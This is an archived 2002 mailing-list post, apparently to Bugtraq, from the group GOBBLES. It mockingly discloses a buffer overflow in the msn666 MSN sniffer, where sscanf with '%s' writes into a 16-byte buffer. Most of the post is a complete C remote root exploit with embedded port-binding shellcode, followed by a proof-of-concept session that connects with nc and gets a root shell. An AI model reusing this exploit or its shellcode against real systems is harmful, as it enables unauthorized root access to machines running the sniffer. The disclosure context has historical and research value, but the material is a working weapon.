UPDATE UPDATE UPDATE UPDATE UPDATE UPDATE

From: gobblesat_private
Date: Fri Jun 14 2002 - 08:25:19 PDT

  • Next message: Christopher X. Candreva: "Re: Another cgiemail bug" 

    -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++
++++STILL BACKDOOR IN MSN666 MSN SNIFFER FOR SNIFFING MSN+++++
 ++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++


+EMERGENCY+++

After disclosing malicicious backdoor root hole in msn666 sniffer
for sniffing msn yesterday, GOBBLES notice following in he inbox:

...

<QUOTE>

What about the version posted today?

http://underground.or.kr/project/msn666/msn666-1.0.1.tar.gz

Thanks!

- ---
Dustin Miller, President
SharePoint Experts, a division of FuseWerx LTD
http://www.sharepointexperts.com/
http://www.fusewerx.com/

</QUOTE>


Thank you Mr. President! GOBBLES get right on it hehehe ;PPppPP

Then we also see this:

Return-Path: <cyrusat_private>
X-Sieve: cmu-sieve 2.0
Return-Path: <s1980914at_private>
Received: from smtp4.hushmail.com (smtp4.hushmail.com [64.40.111.34])
        by imap3.hushmail.com (Postfix) with ESMTP id E780E28184E
        for <gobbles_40hushmail_2ecomat_private>; Fri, 14 Jun 2002 08:08:17 -0700 (PDT)
Received: from inhavision.inha.ac.kr (inhavision.inha.ac.kr [165.246.10.162])
        by smtp4.hushmail.com (Postfix) with ESMTP
        id B7A2B3F11; Fri, 14 Jun 2002 08:08:04 -0700 (PDT)
Received: from SEONUS (inhavision.inha.ac.kr [165.246.10.162])
        by inhavision.inha.ac.kr (8.11.1/8.11.1) with SMTP id g5EFFJ509086;
        Sat, 15 Jun 2002 00:15:22 +0900 (KST)
Message-ID: <001801c213b4$b3563e90$6401a8c0@SEONUS>
From: "Seunghyun Seo" <s1980914at_private>
To: <gobblesat_private>, <camisat_private>
Cc: <bugtraqat_private>, <vuln-devat_private>,
        <bugsat_private>, <vulnwatchat_private>,
        <submissionsat_private>, <GOBBLESat_private>
References: <200206132342.g5DNgvc54973at_private>
Subject: Re: +ALERT+ BACKDOOR IN MSN666 SNIFFER FOR SNIFFING MSN +ALERT+
Date: Sat, 15 Jun 2002 00:03:46 +0900
Organization: khdp.org, underground.or.kr
MIME-Version: 1.0
Content-Type: text/plain;
        charset="euc-kr"
Content-Transfer-Encoding: base64
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2462.0000


I'm writer of msn666 msn messege sniffer,
there are no problems, and no backdoors in it,
if you read the code and procdulre of it detail then you could notice it rightly.

Check msn666-1.0.0.tar.gz  and msn666-1.0.1.tar.gz
at http://underground.or.kr/project/msn666/  again.
previous my attaching file needs revision.

...

And still see bugs? in code... HRM!?!?!


+ALERT+++

Backdoor still present in updated version of msn666 sniffer for
sniffing msn.

+DETAILS+++

GOBBLES-scan-incoming detect following in incoming backdoor packag-
e of updated msn666 sniffer for sniffing msn version 1.0.1:

msn666.c:

...

void
pattern2 ( char *msg, int size )
{
        char opmsg[16];

...

        sscanf ( msg, "%s", &opmsg );

...

It still called like this from runpkt():

...

        if ( (int)htons(tcp->dest) == 1863 || ok_flg ) {

...

        if ( tcp->psh ) {
                memcpy ( buf, data, sizeof(buf) );
                pattern2( buf, htons(ip->tot_len)-40 );
...

GOBBLES think it quite obvious this is still malicicous root backdoor
in msn666 sniffer for sniffing msn.

+EXPLOIT CODE+++

Now that GOBBLES save he friends of team bugtraq from malicious backdoor
root hole in msn666 sniffer for sniffing msn version 1.0.0 and msn666
sniffer for sniffing msn version 1.0.1 it is time to release he exploit
code:

/*
 * disclaimer:
 *
 * GOBBLES SECURITY LABS (GSL) members working
 * on version with -m capabilities. Utilizing libnet.
 *
 * GOBBLES <3 ROUTE
 *
 * This version proves point that even two year
 * old can write remote exploit. Somehow, this
 * horribly written code by Alicia's 2 year old
 * adopted korean nephew works. Remember if you
 * flame this code, you're mocking a 2 year old
 * with more skill than you.
 *
 * There is nothing special about having the ability
 * to write remote root xploits.
 *
 */
/*
 * GOBBLES-own-msn666.c (Quack Sang edition)
 *
 */

// #include <libnet.h>

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

#define DADA 0x90

char nappytime[256], treattreat[] =
        // GOBBLES use Taeho shellcode because he speak turkey, hehehe
        // Hello friend Taeho Oh! Come pick up shirt at Defcon@!@!
        "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
        "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
        "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
        "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
        "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
        "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
        "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
        "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
        "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
        "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
        "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";


int
main(int argc, char **argv)
{
        struct sockaddr_in playtime;
        struct hostent *poopoo;
        struct iphdr *peepee;
        struct tcphdr *noodlemmm;
        int phewwy, banana, yes = 1;
        char *diaper, *googoo, *store;

        if(argc != 4) {
                fprintf(stdout, "%s <shellcode_address> <source_ip> <dest_host>\n", argv[0]);
                exit(1);
        }

        sscanf(argv[1], "%p", &store);

        banana = (sizeof(struct iphdr) + sizeof(struct tcphdr) + strlen(treattreat) + sizeof(nappytime) + 24 + 1);
        diaper = malloc(banana);
        googoo = (char *) (diaper + sizeof(struct iphdr) + sizeof(struct tcphdr));

        peepee = (struct iphdr *) diaper;
        noodlemmm = (struct tcphdr *) (diaper + sizeof(struct iphdr));

        memset(diaper, '\0', banana);
        memset(googoo, 'x', 16);
        *(long *)&googoo[16] = (long)store;
        *(long *)&googoo[20] = (long)store;
        memset(nappytime, DADA, sizeof(nappytime));
        memcpy(googoo+24, nappytime, strlen(nappytime));
        memcpy(googoo+24+strlen(nappytime), treattreat, strlen(treattreat));

        if((poopoo = gethostbyname(argv[3])) == NULL) {
                perror(";PPppPPpPp");
                exit(1);
        }

        if((phewwy = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
                perror(";PPpPPpPP");
                exit(1);
        }

        if (setsockopt(phewwy, IPPROTO_IP, IP_HDRINCL, (char *)&yes, sizeof(yes)) == -1) {
                perror(";PPppPPPp");
                exit(1);
        }

        /* hihihihihi */
        peepee->version = 4;
        peepee->ihl = 5;
        peepee->tot_len = htons(banana);
        peepee->id = htons(getpid());
        peepee->frag_off = 0;
        peepee->ttl = 255;
        peepee->protocol = IPPROTO_TCP;
        peepee->check = 0;
        peepee->saddr = inet_addr(argv[2]);
        /* giggle */
        peepee->daddr = inet_addr(inet_ntoa(*((struct in_addr *)poopoo->h_addr)));
        /* dewty diapey?!? */
        noodlemmm->source = htons(9999);
        noodlemmm->dest = htons(1863);
        noodlemmm->seq = random();
        noodlemmm->doff = 5;
        noodlemmm->syn = 0;
        noodlemmm->window = htons(8888);
        noodlemmm->psh = 1;

        playtime.sin_family = AF_INET;
        playtime.sin_port = noodlemmm->dest;
        playtime.sin_addr = *((struct in_addr *)poopoo->h_addr);
        memset(&(playtime.sin_zero), '\0', 8);


        if((sendto(phewwy, diaper, banana, 0, (struct sockaddr *)&playtime, sizeof(struct sockaddr))) == -1) {
                perror(";PPpPPPppPP");
                exit(1);
        }
        else {
                fprintf(stdout, "!@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@#\n");
                exit(0);
        }
}



+PROOF OF CONCEPT+++

GOBBLES run msn666 sniffer for sniffing msn version 1.0.1 on he Local
Area Network (LAN) once again to prove point:

# ./msn666


Then GOBBLES run he Quack Sang version of GOBBLES-own-msn666.c:

# ./GOBBLES-own-msn666 0xbfffd6d0 192.168.0.1 192.168.0.2
!@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@#
# nc 192.168.0.2 30464
id
uid=0(root) gid=0(root) groups=0(root)



+GREETZ+++
Dave Ahmed for sorting our the mess for us.  Look for us at
defcon, we've got a special tshirt just for you!

All our friends who have already emailed us with their thanks
for saving them from this sneaky backdoor.  Hopefully, now that
the Quack Sang exploit is now private, it'll encourage people
to stop running the software and to those naughty people who
think sniffing is an ethical action (mailsnarf anyone?), will
get what they deserve.

GOBBLES Security
http://www.bugtraq.org
http://www.immunitysec.com/GOBBLES/ <- first official mirror,
                                       thanks so much Dave!

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj0KB9kVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPYe4A
n3X6YEh7eOA6uv5c2zQ6OTX8qybDAJ9mw17ofjDqRcgwVp7lMRz7+YlDKg==
=rD4m
-----END PGP SIGNATURE-----

    This archive was generated by hypermail 2b30 : Fri Jun 14 2002 - 08:59:50 PDT